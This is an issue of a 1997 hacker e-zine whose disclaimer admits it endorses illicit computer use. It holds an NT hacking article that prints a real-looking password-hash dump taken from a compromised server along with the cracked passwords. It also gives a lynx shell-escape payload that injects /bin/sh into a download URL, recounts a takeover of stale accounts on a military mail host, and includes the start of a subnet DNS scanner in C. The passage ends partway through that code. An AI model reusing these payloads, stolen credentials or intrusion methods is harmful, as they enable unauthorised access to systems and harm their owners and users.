Copy Link
Add to Bookmark
Report
The Havoc Technical Journal 13
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The HAVOC Technical Journal - http://www.thtj.com - ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
Vol. 2 | No. 1 | August 1st, 1997 | A HAVOC Bell Systems Publication
Issue 13 "Expand your mind."
_____________________________________________________________________________
-[The HAVOC Technical Journal Issue 13]-
Editorial..............................Scud-O
NT Hacking.............................WaRsPrItE
Breaking out of Freenet Menu Shell.....N-TREEG
How to hack military e-mail servers....WaRsPrItE
DNS Scanner - dns.c....................memor
Connection Hijacking Attack............Merde Fuk
One method to keep root................WaRsPrItE
Carding..more basics for the lame......ArcAngl
Cellular Programming Archives, Pt. I...Phrax
Basic Social Engineering...............WaRsPrItE
DTMF Decoding..........................ArcAngl
Redneck Phreaking......................shoelace
Basic UNIX Scripting...................WaRsPrItE
KEEPING UP WITH THE TELCOS.............ArcAngl
The Weather Report: Federal Numbers....WeatherM
Fake IDs...............................N-TREEG
Oddville, THTJ.........................Scud-O
The News...............................KungFuFox
Logs...................................THTJ
-------------------------------------------------
_____________________________________________________________
The HAVOC Technical Journal - Information
- Editor in Chief : Scud-O, scud@thtj.com
- Assitant Editor : KungFuFox, mazer@cycat.com
- Submissions Editor: Keystroke, keystroke@thepentagon.com
- THTJ email address: thtj@thtj.com
- THTJ website: http://www.thtj.com
- THTJ mailing address: PO BOX 448 Sykesville, MD 21784
The HAVOC Technical Journal Vol. 2, No.1, August 1st, 1997.
A HAVOC Bell Systems Publication. Contents Copyright (©)
1997 HAVOC Bell Systems Publishing. All Rights Reserved.
No part of this publication may be reproduced in whole or
in part without the expressed written consent of HAVOC
Bell Systems Publishing. [No copying THTJ, damnit.]
The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]
For infomation about using articles published in THTJ, send mail to:
e-mail: thtj@thtj.com
mail: THTJ
c/o HBS
PO Box 448
Sykesville, MD 21784
_____________________________________________________________
[Editorial : by Scud-O] Expanding one's mind
This month I would like to talk to you about a topic that needs to
be addressed. We as a species have begun to slow our development. Nature
leaves survival to the fittest, but with today's technology, more people than
we should have survive. This may sound great, but for a species to advance,
we need to have this survival of the fittest. The best way i can see to
accomplish this is by expanding one's mind. A fast mind can own a fast body
any day. Now, by being a hacker you do show a strive to expand your mind. And
this is good, but only 'real' hacking ( i.e. finding new holes, working to
trace connections and data flow thru machines is real hacking to me. ) mail
bombing, and anarchy are not hacking. they do not expand one's mind. Cookbook
hacking is also not a method to expand your mind. By using a 'cookbook' to
hack you are in fact shutting your mind off. You are simply following
directions, and what serious thought is expelled on that? none.
Expanding your mind uses all of your senses. Expanding your mind
expands to more than just hacking. New experiences help to increase your
knowledge, and thus your mind. Try new things. If early cave men had not
rubbed two wooden sticks together, would we have fire? no. And where would we
be today if we had not discovered fire? Still in a cave. Our minds are waiting
to be expanded. We still have 90% of our brain left to use up. If we don't
expand ourselves, it would be an awful waste of space, would it not? So
go on, expand yourself.
Scud-O , Founder, and Editor in Chief of THTJ
+----------------------------------------+
Scud-O and HBS would like to hear your views on this issue.
Please feel free to e-mail us at: scud@thtj.com
----------------------------------------------
/ ---/ --/ / / | /------/ / /
/--- /-----/------/-----/ / / /
/----------/ /--------/
-of HAVOC Bell Systems-
scud@thtj.com | http://www.thtj.com
-------
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³The Playlist - by Scud-O - for July 1997 - ³±
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ±
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
This list comes from Scud-O's house and car stereos, and these were his
most played CD's during the month of July.
These are not organized into anyway, it is just written up as Scud-O finds
the CD laying around his house.
Artist Title
------ ----------------
Various Saturday Night Fever Soundtrack
Various sm:)e mix session 1 by dj scott henry
Atari Teenage Riot Burn, Berlin, Burn!
The Future Sound of London Accelerator
The Future Sound of London Dead Cities
Various Songs in the key of x ( X-Files )
Fugees The Score
Squirrel Nut Zippers Hot
Beck Odelay
The Prodigy Experience
The Prodigy Music for the Jilted Generation
Prodigy The Fat of the Land
Soul Coughing Ruby Vroom
Soul Coughing Irrestable Bliss
wyclef jean The Carnival
Adam Sandler They're all gunna laugh at you!
Various MTV's amp
Next Month: Scud-O's entire CD collection ( god is that gunna take a while to
type up! )
_____________________________________________________________
NT Hacking by WaRsPrItE
===================================
= Contents =
===================================
I. WaRsPrItE's talk on NT Hacking
II. Info on the pwdump Utility
III. Info on L0phtCrack
IV. The Password file tested
V. Results
===================================
I. WaRsPrItE's talk on NT Hacking
-----------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
First off, I'd like to say that I think that this is an excellent
utility for checking the security of NT networks. However, just like
the now infamous and much over-hyped "SATAN" it's not the skeleton
key into any NT network.
As I say in every fucking article I write, the key is in the basics.
If users pick good passwords then they are next to impossible to
crack. For example, if you use upper case, lower case, and numbers
then there are 1.240176943466 x 10(25) possible combinations. Now add
some punctuation to that! Remember in NT the password can be up to 14
charaters as opposed to the 8 in *NIX. Just to put that that in
perspective, the sun will go nova in about 1.0 x 10(10) years and in
about 1.0 x 10(21) years until all orbits decay by gravitational
radiation. So needless to say my little brute force attack was futile
at best :).
The two programs I used in the attack were L0phtCrack and PWDUMP. I
must say that PWDump [by Jeremy Allison, jra@cygnus.com] works
beautifully. Provided you're logged in as "administrator". So why use
it to hack then?! Because it'll work on any copy of a registry! If
you can swipe some backup media from the server room that might have
a copy of the registry on it :). The NT I exploited and who's password
hashes I included in this zine, I hacked because the moron sysadmin
allowed Domain users to log on locally on the server. During
installation NT asks if you want to make emergency repair disks
(rdisk.exe) and the default choice is "yes". Everytime you run rdisk
NT stores a copy of the Registry in %SystemRoot%\Repair. And the
default permission of that directory is "read" for normal users. Piece
of cake to get a copy of the registry. The problem is, that any
passwords that have been changed since the the last time rdisk was
run won't work (minor glitch). Now that you have a copy of the
registry what do you do with it? Well, find an NT machine that you
can login as "administrator" and run PWDump.exe. In this case I
brown nosed some warez fags and installed it at home :). After that
it's pretty simple, run L0phtCrack.exe with your favorite wordlist or
use it in brute force mode. It took me 6 days on a Pentium 133 to get
three accounts. Amazingly,it got passwords that were 6 charaters long!
Cudos to L0pht!
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMeMcqX5eXk/jGmY7AQH1yQf/YFpgsAk7iIPEcfOUTiUJ17O2KhujgSfl
8xZgC7gIHR98uzSwqlJerXQlYUFUfNj7CZvO2/SJMeV8bU/bLFF7Ki9zmo+57vkH
z6HfzcF4Wyy/o7y854jOQBPfsXQd6+Nbivc1l1sriaQ4H25hxhLkXA1UFchWD9hk
8xv5nSDPZxlCHobWau/sK+Of92DfFQV1Fw2v5Kyeo0jiWZItaghlMvfYu3eeGtQ0
8sTNg4BDiHQeoQ9/cG+zapKa6UZcPZLyQHXCF36zz23Rtm7bC0jMqUv5BONgWk4W
cuptOS+pmZqsDhf3XWPEHTaugZSluEGUd9A34siF/wjmGwgXN8cO9w==
=yiB2
-----END PGP SIGNATURE-----
II. Info on the pwdump Utility
-------------------------------
Windows NT Password Dump Utility
--------------------------------
This handy utility dumps the password database of an NT machine that
is held in the NT registry (under
HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users) into a valid
smbpasswd format file. This should be a help to Samba administrators
who have a master password database on a Windows NT machine and need
to keep this in sync with the smbpasswd file on their UNIX/Samba
server.
This utility dumps NT password entries in the format :
<user>:<id>:<lanman pw>:<NT pw>:comment:homedir:
Where <user> is the user-name on Windows NT, <id> is the Windows NT
RID (relative ID) - the last 32 bit component of the Windows NT users
SID, <lanman pw> is the users lanman password hash, <NT pw> is the
users Windows NT (md4) password hash - note that if the user has no
password these will be dumped as the string 'NO PASSWORD*****', if the
account is disabled or invalid these are dumped as 32 '*'
characters. The comment is a concatenation of the users full name on
Windows NT and the description field in the Windows NT user-manager
program. The homedir cannot contain ':' characters unfortunately, as
these are used as field separators in the smbpasswd file (as per
UNIX), all ':' characters after drive letters are dumped as '_'
characters.
How to use pwdump
-----------------
Only as a suggestion, I would recommend dumping your NT machines
account database and then creating regular UNIX users (in /etc/passwd)
with the same UNIX account numbers as their NT RID - this will make
replicating the smbpasswd file much easier later on. These /etc/passwd
accounts may have disabled password entries, prohibiting the NT users
from logging onto the UNIX box via telnet (this is similar to removing
the 'log on locally' right on an NT server). This will not prohibit
them from using the Samba box as a server via Samba though. The
created smbpasswd file may then be copied to the
$SAMBA/private/smbpasswd file (where $SAMBA is the base directory you
installed Samba into). If Samba is set up for user level security and
encrypted passwords (set :
security = user encrypted passwords = yes
in your smb.conf file) then Windows NT / 95 users who have logged on
to the NT domain will be able to transparently access the resources on
the Samba box as their correct UNIX user id's (the ones you originally
created). You can then set up a 'AT' job on your NT server to
periodically dump your NT password database into a new smbpasswd file
and copy it over (securely somehow) to the Samba server to keep the
password databases on the two machines in sync.
The pwdump.exe utility can take a \\machine name as argument, it will
then proceed to dump the password database from that machine instead
of the local machine, if it has sufficient privillages to do so. By
default it will dump the password database of the local machine.
NOTE: The passwords dumped by this utility are 'plain-text equivalent'
in the CIFS protocol and *MUST* be protected. The UNIX security on the
smbpasswd file *MUST* be set to (owner root, permissions rw------- -
ie. read/write owner, no access to anyone else).
Future Enhancements
-------------------
As this code decrypts the obfuscication step in the NT password
database it may be reversed, allowing a lanman and md4 hash to be
written into the NT registry for a user account. This would allow a
UNIX/Samba box to be the master repository for user account details,
and the account passwords to be replicated and 'brute forced' into the
NT password database, bypassing the rather baroque NT API mechanisms.
This code doesn't attempt to do this however, this is left as an
'exercise to the reader' (or an enterprising university somewhere :-).
How it works
------------
This utility takes great pains to maintain NT security as it wanders
through the NT SAM areas of the registry. It will not even run is you
are not running as Administrator. Firstly it goes through and adds the
'minimum necessary change' (see Asimov's 'the End of Eternity' :-) to
allow the program to read the password entries. It dumps the users
entries (see the code for details) and then goes back through the
registry restoring the security on all the keys it touched. I have
tested this code on NT Server/Workstation 4.0 and NT 3.51 and have
never had problems, but as always, this code has *NO GUARANTEE*
associated.
Source code
-----------
The source code for this utility may be found in
ftp://samba.anu.edu.au/pub/samba/pwdump/pwdump.c
Note that this code needs a DES library to compile. The one I used in
development is Eric Young's excellent DES library found at :
ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-4.01.tar.gz
which compiles fine under Windows NT. I used Microsoft Visual C++ 4.x
as the compile environment. The code pwdump.exe is provided for people
who do not have a compiler and is a binary of the program for x86 NT
machines (are there any other kind :-).
Please report all bugs to :
Jeremy Allison,
jra@cygnus.com
libdes, Version 4.01 13-Jan-97
Copyright (c) 1997, Eric Young
All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms specified in COPYRIGHT.
--
The primary ftp site for this library is
ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/libdes-x.xx.tar.gz
libdes is now also shipped with SSLeay. Primary ftp site of
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.x.x.tar.gz
The best way to build this library is to build it as part of SSLeay.
This kit builds a DES encryption library and a DES encryption program.
It supports ecb, cbc, ofb, cfb, triple ecb, triple cbc, triple ofb,
triple cfb, desx, and MIT's pcbc encryption modes and also has a fast
implementation of crypt(3).
It contains support routines to read keys from a terminal,
generate a random key, generate a key from an arbitrary length string,
read/write encrypted data from/to a file descriptor.
The implementation was written so as to conform with the manual entry
for the des_crypt(3) library routines from MIT's project Athena.
destest should be run after compilation to test the des routines.
rpw should be run after compilation to test the read password routines.
The des program is a replacement for the sun des command. I believe it
conforms to the sun version.
The Imakefile is setup for use in the kerberos distribution.
These routines are best compiled with gcc or any other good
optimising compiler.
Just turn you optimiser up to the highest settings and run destest
after the build to make sure everything works.
I believe these routines are close to the fastest and most portable DES
routines that use small lookup tables (4.5k) that are publicly available.
The fcrypt routine is faster than ufc's fcrypt (when compiling with
gcc2 -O2) on the sparc 2 (1410 vs 1270) but is not so good on other machines
(on a sun3/260 168 vs 336). It is a function of CPU on chip cache size.
[ 10-Jan-97 and a function of an incorrect speed testing program in
ufc which gave much better test figures that reality ].
It is worth noting that on sparc and Alpha CPUs, performance of the DES
library can vary by upto %10 due to the positioning of files after application
linkage.
Eric Young (eay@mincom.oz.au)
----
III. Info on L0phtCrack
-----------------------
L0pht Security Advisory
Advisory released April 10 1997
Program: L0phtcrack.exe - Windows NT password insecurities
Vulnerability Scope: Windows NT
Severity: The L0pht is pleased to release L0phtcrack rev 1.
This program recovers the LANMAN and/or NT Dialect
MD4 plaintext password from output derived from the
SAM registry.
Authors: mudge@l0pht.com
weld@l0pht.com
Intro:
This tool, as with many others, can be used for breaking into systems
in illegal fashions - THAT IS NOT WHAT IT IS INTENDED FOR! We had a
working version done the same day that PWDump was released in order
to audit some of our internal networks. However, as we started
researching more into it we noticed many shortcomings in how MS
security is handled and present some of these in our tool. We take
no responsibility for misuse of this information. It is our belief
that the only way to protect yourself is to fully understand your
vulnerabilities. Unfortunately, for some of these problems we still
don't see immediate solutions. Our particular solution has been to
trust our users, and not let any of our NT machines talk to the internet
(ie filtered very tightly at the perimiter). We are interested in
other solutions.
Overview:
Recently several NT password crackers have emerged. We offer this
one with the belief that it offers some features and functionality
that the current ones do not have.
L0phtcrack will recover passwords from Windows NT registries in a
variety of fashions.
By feeding in the output from PWDump [by Jeremy Allison, jra@cygnus.com]
and a dictionary file, L0phtcrack rev 1 will attempt to retrieve:
1) only the LANMAN plaintext password
2) only the NT Dialect MD4 plaintext password [see reasoning below]
3) Both the LANMAN and MD4 plaintext passwords (by deriving the
MD4 password from the LANMAN output and running through up to
2 to the Nth power permutations)
Alternatively, L0phtcrack gives you the capability to _brute force_ the
entire key space and recover ALL USER PASSWORDS up to 14 characters in
length.
By going through the entire keyspace available, this program
WILL RETURN ALL OF THE PLAINTEXT PASSWORDS (both LANMAN and MD4) up to
and including 14 characters in length (note that the User Login Dialog
box on NT machines limits the amount of characters that can be typed
to 14 for the MD4 dialect. Future releases of this software will enable
brute forcing of up to 16 characters for MD4).
L0phtcrack comes in three flavours:
1) A nice Windows GUI interface so you can point and click.
2) A CLI version for running in "DOS" windows.
3) Source code that is generic enough to build on most Un*x's.
Description:
Here's how it works -
For NT, LANMAN passwords are derived in the following fashion:
. The user password is converted to UPPERCASE
. If the user password is less than 14 bytes, the password is padded
with NULL characters to 14 bytes.
. If the user password is greater than 14 bytes, the password is
truncated to 14 bytes.
. The 14 byte string is split down the middle into two 7 byte strings.
. One 8 byte odd parity des key is derived from each of the 7byte
strings [note1].
. The constant 'magic value' [note2] is then encrypted first
with the first odd parity des key and then with the second. The results
are concatenated. This is the LANMAN OWP [note3].
[note1: There is a significant loss of bits in the str_to_key functions
which derive the 8 byte odd parity DES keys from the 7 byte strings.
This knocks down the possibly key space to attack DES substantially.
Thanks to Hobbit@avian.org for pointing this out to us]
[note2: the constant 'magic value' is derived from the encryption
of 0x4B47532140232425 with a key of all 1's ]
[note3: quickly scanning the LANMAN OWP's it is easy to see who has
passwords that are 7 characters or less. If the second half of the
LANMAN OWP is 0xAAD3B435B51404EE the value for the last seven characters
in the user password were all NULLs.]
For NT, NT Dialect MD4 passwords are derived in the following fashion:
. The users password is converted to Unicode [note4].
. The unicode password is run through MD4 to return a 16 byte value.
This is the MD4 OWP [note5] [note6].
[note4: There is a large amount of confusion as to where Unicode stops.
i.e. is "ABC", which is in actuallity 'A','B','C','\0', encoded
as 'A' '\0' 'B' '\0' 'C' '\0' or 'A' '\0' 'B' '\0' 'C' '\0' '\0' '\0'.
We find that in this situation the former is the case.
[note5: You might say "why do you even bother having an option of doing
_only md4_ when it is much quicker to derive it from the LANMAN
password". To which we would reply "this gives us the ability to
easilly roll in the ability to dictionary attack traffic that we
see on the network. This will be particularly important if the
proposed changes to the CIFS spec go into place. See our S/Key
cracker MONKEY for more of an idea on what's to come".]
[note6: For those who were building md4 crypt-n-compare engines from
inside Microsoft's Visual C++ IDE. The VC++ does not by default
define _MSDOS_, or 8086 which are necesarry to through the byte
ordering into the correct mode in md4.c]
What we do in rev 1 -
In rev 1 of l0phtcrack the user must hand in a password file
in the format of Jeremy Allison's PWDump output. From this
the following actions can be taken.
LANMAN only -
A dictionary is fed in and each word is encrypted using the
LANMAN one round DES format as described above. The list of
users is checked against this encrypted OWP. Any that are
found matching are flagged.
MD4 only -
A dictionary is fed in and each word is encrypted using
md4. The list of users is checked against this encrypted OWP.
Any that are found matching are flagged. See the description
of rev 2 for why this option is important.
LANMAN and md4 -
A dictionary is fed in and each user is first checked against
the LANMAN one round DES OWP. If a match is found, the word
is run through 2 to the power of strlen(word) case permutations
in md4 to return the case sensitive md4 value.
Brute force -
An input string containing the list of valid characters is
run through sequentially in all possible combinations up to
7 characters in length. The first half and second half of the
LANMAN password are compared against these, thus returning
all passwords up to 14 characters in total length. Since the
logon screen will not allow you to enter more than 14 characters
,even though the NT MD4 dialect will allow up to 128, this
should return all users passwords. When a match is found
the word is run through 2 to the power of strlen(word).
By changing the default string that is processed through you
can drastically change the amount of time it takes to brute
through the entire keyspace. Keep in mind that the following
characters are not valid in passwords so they don't need to
be included: '/', '\', '[', ']', ':', ';', '|,' ,'=', ',',
'+', '*', '?', '<', '>' [according to the MS technet information].
For example: if you just want to check all combinations of letters
all you have to run through is ABCDEFGHIJKLMNOPQRSTUVWXYZ.
rev 2 will have this optimized a bit more, in addition to allowing
a remote querry to our tables of precomputed hashes, thus reducing
the problem to that of a table lookup.
Why is it important to be able to attack md4 only? That is much
slower!
The changes being made to the CIFS spec imply that in the future
a server will be able to force a client to use the NT dialect
and not negotiate down. Based upon how the "key exchange" is
done this will be attackable via the hooks put in for md4 only
much in a similar way that our program "MONKEY" will attack
s/key sessions based upon promiscuously viewed network traffic.
errata in rev 1 -
Several of the routines need to be optimized a bit more but the
tool is quite usable and quite fast as it is (100 users and an
an 8 meg dictionary file took under 1 minute on a PPRo 200
with the GUI version. The CLI is slightly faster - the bruting
with a string of "ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789-_"
took a little over 3 days on a P133).
There are hooks to preen through the user list and instantly kick
out whether a user has a password of 7 characters or less, or
if a users password is greater than 7 chars.
If you specify md4 only it just does a straight dictionary
crypt and compare, if you specify any other method that returns
md4 values it runs through all case possibilities.
The brute forcer is not implemented in the windows GUI version. Use
the command line version for this functionality.
What you can expect to see in rev 2 -
. The functionality of PWDump will be included in the l0phtcrack
program so you won't need to run seperate programs.
. You should be able to pull down registries from remote / local
machines WITHOUT BEING ADMINISTRATOR and WITHOUT NEEDING TO
KNOW THE ADMINISTRATOR's PASSWORD [read this bullet item again!!!]
- we believe we are very close to being able to do this now.
. You will be able to brute force the NT Dialect password up to
16 characters in length for those tricky network users that
never log in via the console.
. The windows GUI will be multi-threaded to take advantage of
multiple processors for dramatically improved brute forcing.
. We should have pre-computed tables of the entire key-space
available so all that needs to be done is a remote table look
up.
L0phtcrack is freely available from the l0pht advisories page:
http://www.l0pht.com/advisories.html
screenshots should be available on the web page in the next couple
of days.
If anyone makes modifications / improvements please mail the diffs to
mudge@l0pht.com.
We hope this tool is usefull,
mudge@l0pht.com , weld@l0pht.com
--------------
For other advisories check out http://www.l0pht.com/advisories.html
--------------
IV. The Password file tested
------------------------------
I edited this to cover my ass and for space requirements.
But it's still a valid file for cracking purposes.
Administrator:500:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
Guest:501:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1004:ACAA2B2B4DB1C2F509752A3293831D17:CA45A13FD16012BF33AA68CDFE061FCD:<user name>::
ccrouter:1009:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1010:9C0E16584A1066E6C2265B23734E0DAC:3BC5E21044369A593A461ABB6942A8A5:<user name>::
<user name>:1011:D30B776BDA67C893AAD3B435B51404EE:9507A8AD5A9BDFC54E08F713CB74764F:<user name>::
<user name>:1012:1E074F8EF51098B2AAD3B435B51404EE:4F99B255DB7C1852ED01A80576202901:<user name>::
<user name>:1013:904021AAA178696DAAD3B435B51404EE:E8CD0E4A9E89EAB931DC5338FCBEC54A:<user name>::
<user name>:1014:0A5A9AD4C8774E46C2265B23734E0DAC:6ABC3FA6A76801DFFC63BE7565CFD666:<user name>::
<user name>:1015:3F109A599C4324BD93E28745B8BF4BA6:CA162D1F614293BC30686E0AC2F0E67A:<user name>::
<user name>:1016:7CF5973DF34EA1443B80EEA293B236B6:3E5CC1D5EDB4B91334EFEEF1258D3E50:<user name>::
<user name>:1017:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1018:9EF072AE87B5C9C4AAD3B435B51404EE:6FF0D8A475E5C5B0DFD6A8676F18A829:<user name>::
<user name>:1019:6166F0244140F965AAD3B435B51404EE:ECF1BE0786D6E49470107CAB4E3B3E7B:<user name>::
<user name>:1020:BE4C45E3524EF720F500944B53168930:8BB50ADC452C4EE196775B7B5008B341:<user name>::
Supervisor:1026:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
FPNW Service Account:1027:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1030:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1040:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1041:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1042:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1043:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1044:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1045:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1046:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1047:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1048:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1049:D8664E71BB1CF3C8CCF9155E3E7DB453:61931712EDDBA17491BD10470791A332:<user name>::
<user name>:1051:0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52:<user name>::
test:1061:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
<user name>:1062:6B35A2BA7D7C5B3AAAD3B435B51404EE:3A1B4CFCEB4385D1108253A357B2955E:<user name>::
FILE-SERVER$:1066:79570B2F6875312AA1455905822538D8:D114D50DD21D6ADDEBB008E3231D7A44:::
NT$:1067:07128FE8EEB666E788371ED292FDCCE7:AF7C003BB0917BC28E37F1785E2B9018:::
<user name>:1068:83C1B8F7D36B754BCEC18980D4FFADA7:5E4328C5D46384588E45A68547DBFF33:<user name>::
IUSR_FILE-SERVER:1069:338C0358DECFDA2902386B2E93EFFD10:9393E296495FDC72CCF951D249BB921F:<user name>::
PLUTONIUM$:1070:C31C1D58633BE3ED27892589E3A13688:26BC63583A0EB0DB6E7C6DCA33F3AB00:::
-----
V. Results
-------------
User: [<user name>] Lanman PW: [LOBOS1] NT dialect PW: [lobos1]
User: [<user name>] Lanman PW: [MANDAR] NT dialect PW: [mandar]
User: [<user name>] Lanman PW: [SKIING] NT dialect PW: [skiing]
_____________________________________________________________
Breaking out of Freenet Menu Shell
compiled by N-TREEG
Source and credit goes to: CERT & General Protection Fault
Freenet's are great becuase of the operative word _FREE_. But most have
extremely restrictive menu shells and for the most part, they won't give you
access to your favorite bourne (bash, csh) shell or whatnot. That really
sucks. Do they not trust us with a fully functional interactive shell? ;-)
Well I know that another online zine has published info on how to get to a
bourne shell through pine. That took a good bit of work to set up and get
going correctly. I think this method is a lot easier. All you need is
access to lynx. (Being able to cut and paste helps too if you're as
lazy as I am.)
Here's how:
Start up lynx.
Hit g (for go to).
Enter this into the "URL to open:" field
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/nul
When it says "Enter a filename:" enter this
/dev/null
When it returns "File exists. Overwrite? (y/n)" hit y
You should hopefully see a beautiful little $ now. There's your local
shell. Have fun. Aren't freenet's grand? ;-)
"HaX0r3d PerceptionS leases ... THTJ ownz."
N-TREEG
http://www.afn.org/~afn56746
HaX0r3d PerceptionS
_____________________________________________________________
How to hack military e-mail servers....WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
Are our military networks safer than their civilian counter parts?
Most military bases, if not all military bases, have a some sort UNIX server
to route non-classified email. Usually, the machine is identified as
emh(electronic mail host).<basename>.<branch>.mil. It is extremely easy for
military members to get an account on one of these servers, simply call up
and request one. As we all know, military members quite often get orders to
other installations, especially those personnel stationed overseas. Due to
this fact, electronic mail hosts quite often have huge password files and
many of the accounts contained in that file are for users that "shipped out"
long ago and never had their account removed from the system. A friend of
mine exploited this one night when we discovered the fact that the server
also had it's security set so that every 6 months a new password containing
numbers or punctuation was required. The problem was that the system didn't
prompt you for your old password before requesting a new one. We tried
connecting to the system via Telnet on a hacked account from a generic ISP
with no luck. The good news was that we were overseas and overseas bases
have phone systems that are independant of the host nations' system. Meaning
there had to be a number to dial to get connected to the base's phone system
if you happened to be off the base. This number is realitively easy to get
just call the local base operator and ask for it. The kicker was that the
local dumbass jarhead Marine base was still running with X-Bar switching not
ESS like us. So here's what we did....
<Our Base> -> <Jarhead's dial up> -> <Our Dial Up> -> <Mail Host modem>
After that, it was simple, we dialed in with a socially engineered legit
account and went to /etc and did a cat of passwd (NOT SHADOW!)and logged it
locally. After gaining a listing of accounts on the system we logged off.
After that, we just simply tried every login until we found one that was
overdue for a passwd change. We then set a password for it and made a note of
the account. If we wanted to pursue it further we could have done a finger on
the account to see which,if any, other servers the individual had accounts on
since the military uses the standard of, <first seven charaters of your last
name + first initial> to determine logins. I'm not offering this story as an
example of my k-rad 3l33t3 skillz. Just to show that simple exploits often
work the best. `Nuff said!
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/EOH5eXk/jGmY7AQFz7Af/d/412J9CqTjyes4ojUo0eLT9+3KwEaXd
1aVaB2+rJQ8oTHMWlfdng14IcisQLRuMsUlSwO7Ud4C/y1eELemu98OeqiP/2t+K
9rCbphpBQ9a2Dhv37HeyxH0z+Gh+0eeeBbipAL/NVCgFQYKM8Jdong4BQwsgoCFR
PZo2eDScMCAQSI9a2MY285UnNGQIoeLXmcN626WEFOSYTC9trhXPdciHhsLtVBuT
zZuXzCYMMwC2+YP5IFyZgCMN29yw0wCe64hwbwo+/nS4Z0PEXvLsZPJO4oQOC5kU
3P7tp8dvWjun4LP8LBt8806pYNgoQlKCJjxtJAhT752+imONDPefIA==
=V9P6
-----END PGP SIGNATURE-----
_____________________________________________________________
/* By memor / hbs */
/* some dns scanner using */
/* host command */
/* Tested on Linux 2.0.30 */
/* last modified: 29/07/97 */
#include<stdio.h>
void main(int argc,char **argv)
{
char commande[50]; /* define commande as char string */
if (argv[1]!=NULL) /* if an argument to the command */
{
int compte=0,pause=0; /* define count & pause */
printf("DNS Scanning from %s.1 to %s.255 \n",argv[1],argv[1]); /* presentation thing */
sprintf(commande,"date"); /* string "date" in commande */
printf("DNS Scanning began at this "); /* presentation thing */
printf("%s :\n",commande); /* print wich command we use (presentation thing) */
system(commande); /* execute command */
for(compte=1;compte<256;compte++) /* counting 1 to 255 */
{
printf("Scan: "); /* presentation thing */
sprintf(commande,"host %s.%i 2>/dev/null",argv[1],compte); /* string ""host %s.%i 2>/dev/null" in command */
printf("resolving %s.%i\n",argv[1],compte); /* presentation thing */
system(commande); /* execute command */
for(pause=0;pause<1000;pause++); /* little pause */
}
sprintf(commande,"date"); /* string "date" in commande */
printf("DNS Scanning ended at this "); /* presentation thing */
printf("%s :\n",commande); /* presentation thing */
system(commande); /* execute command */
}
else /* if no arguments typed */
